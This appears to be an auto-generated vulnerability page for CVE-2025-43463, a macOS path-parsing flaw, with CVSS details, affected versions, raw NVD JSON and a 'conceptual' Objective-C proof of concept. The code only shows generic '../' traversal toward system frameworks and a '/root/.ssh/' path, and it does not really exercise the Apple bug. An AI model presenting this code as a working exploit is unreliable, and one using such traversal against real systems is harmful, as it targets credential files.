Security Vulnerability Report
CVE-2025-43463 CVSS 5.5 MEDIUM

CVE-2025-43463

Published: 2025-12-12 21:15:55
Last Modified: 2026-04-02 19:20:51

Description

A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.7.3, macOS Sonoma 14.8.3, macOS Tahoe 26.1. An app may be able to access sensitive user data.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
macOS Sequoia < 15.7.3
macOS Sonoma < 14.8.3
macOS Tahoe < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
objective-c
// CVE-2025-43463 Path Traversal PoC (Conceptual)
// This is a conceptual proof-of-concept for demonstrating the path parsing issue
#import <Foundation/Foundation.h>

void exploitPathParsing(void) {
    // Example of malicious path that could bypass validation
    NSString *maliciousPath = @"../../../../System/Library/PrivateFrameworks/SensitiveData.framework";

    // Attempt to access protected directory through path traversal
    NSFileManager *fileManager = [NSFileManager defaultManager];
    NSError *error = nil;

    // This demonstrates the vulnerability where path validation is insufficient
    NSArray *contents = [fileManager contentsOfDirectoryAtPath:maliciousPath error:&error];
    if (contents) {
        NSLog(@"Successfully accessed sensitive directory: %@", contents);
    }
}

// Example attack vector through vulnerable API
void vulnerableAPIUsage(NSString *userInput) {
    // Simulating vulnerable code that doesn't properly validate paths
    NSString *basePath = @"/Users/Shared/";
    NSString *targetPath = [basePath stringByAppendingString:userInput];

    // Path like "../../../root/.ssh/" could be used for exploitation
    NSLog(@"Target path: %@", targetPath);
}

int main(void) {
    NSLog(@"CVE-2025-43463 Path Parsing Vulnerability PoC");
    exploitPathParsing();
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43463", "sourceIdentifier": "[email protected]", "published": "2025-12-12T21:15:54.510", "lastModified": "2026-04-02T19:20:50.527", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.7.3, macOS Sonoma 14.8.3, macOS Tahoe 26.1. An app may be able to access sensitive user data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.8.3", "matchCriteriaId": "8E37DC2A-33E6-480B-8DFE-4F6558F0A895"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.3", "matchCriteriaId": "3428C860-E02D-4FE9-96F4-58EEAAB8321D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.1", "matchCriteriaId": "415C0BC8-2EAF-4247-AB6A-BD293014213C"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125634", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125887", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125888", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}